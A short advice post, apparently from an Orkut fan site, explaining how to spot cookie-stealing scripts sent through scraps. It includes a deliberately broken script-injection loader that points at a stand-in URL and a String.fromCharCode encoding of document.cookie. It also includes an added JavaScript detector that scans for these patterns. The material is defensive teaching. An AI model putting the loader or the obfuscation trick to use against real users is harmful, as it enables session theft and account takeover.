How to Detect One: Is This a Cookie Stealing Script?
The title may seem confusing, but we think it's time to show you how to detect a cookie stealing script and so avoid a disaster. Unfortunately, Orkut has become more a place of misuse than a social networking site. This should help you play safe on orkut and avoid dangerous scripts that are forwarded to you or that you stumble upon in a community.
If you have a look at the screen shot, you'll notice one of my contacts sending me a scrap with a cookie stealing script. Basically he has been hacked, and the hacker is now using "scrap all friends" to scrap all his friends, who may believe that their dear friend is sending them a script and would not hesitate to use it.
This can happen to any one of us, so it's necessary for all of us to recognize which scripts are after our cookies.
There are 3 cookie stealing scripts on orkut at this point of time:
NOTE | These scripts have been edited to a large extent so that no one can use them. This is just a learning exercise, so there is no way we can provide anyone with anything of the sort; kindly don't scrap or mail with similar requests.
The Normal Script - If you read the script carefully, you get to see the profile id of the hacker and a document.cookie call, which is the spine of this script.
In case you ever see a UID=123456722489 and document.cookie in a script, then you must remember - Never Ever Run that script.
Url Encoded Script - This script consists of a link, which is usually a user.js:
javascript:increasing_members=document.get('head')[0]; a=document.xxxxElement('scrirpt'); a.src='http://anylink.js'; c.append(a); void(0)
This anylink.js refers to a Greasemonkey script. It may also be a tinyurl, which we have discussed earlier.
Document.Cookie Encoded - This is the latest and most used script on orkut these days. Unfortunately, I have seen a lot of them in many scrapbooks and communities. In this script, the cookie stealing function is encoded, hence not easily detectable.
String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)
The numbers shown above, when decoded, spell out document.cookie. I hope you can guess what they can be used for.
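As an added example (not code from the original post), here is a static check for the indicators described above: a plain document.cookie, a String.fromCharCode-encoded document.cookie, and a loader that pulls a script from a URL. The function names and sample strings are constructed for illustration, and the percent-decoding step goes beyond the post's own cases; the snippet is only inspected as text, never run.

```javascript
// Added example: static check of a pasted "javascript:" snippet. It never runs the input.
// Function and label names are hypothetical, not from the original post.

// Replace every String.fromCharCode(n, n, ...) call with the text it spells.
function decodeCharCodes(text) {
  return text.replace(/String\s*\.\s*fromCharCode\s*\(([\d\s,]+)\)/gi, (match, args) =>
    String.fromCharCode(...args.split(',').map((n) => parseInt(n.trim(), 10))));
}

// Undo percent-encoding (%64%6f%63...) without throwing on malformed input.
function decodePercent(text) {
  try {
    return decodeURIComponent(text);
  } catch (e) {
    return text.replace(/%([0-9a-f]{2})/gi, (m, hex) => String.fromCharCode(parseInt(hex, 16)));
  }
}

function inspectScrapScript(snippet) {
  const findings = [];
  const decoded = decodeCharCodes(decodePercent(snippet));
  if (/document\s*\.\s*cookie/i.test(snippet)) {
    findings.push('plain document.cookie');
  } else if (/document\s*\.\s*cookie/i.test(decoded)) {
    findings.push('encoded document.cookie');
  }
  // A script that pulls in a second script from a URL (a user.js, a short link).
  if (/\.src\s*=/.test(decoded) && /https?:\/\//i.test(decoded)) {
    findings.push('loads remote script');
  }
  return findings;
}

// Constructed samples, modelled on the (already defused) fragments in the post.
const samples = {
  encoded: "javascript:x=String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101);void(0)",
  loader: "javascript:a=document.xxxxElement('scrirpt'); a.src='http://anylink.js'; void(0)",
  harmless: "javascript:alert('hello');void(0)",
};
for (const [name, text] of Object.entries(samples)) {
  console.log(name, inspectScrapScript(text));
}
```

An empty result only means none of these three patterns matched; it does not mean the script is safe to run.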
We hope you support our effort and help us spread the word to reach the masses.
Source: OrkutPlus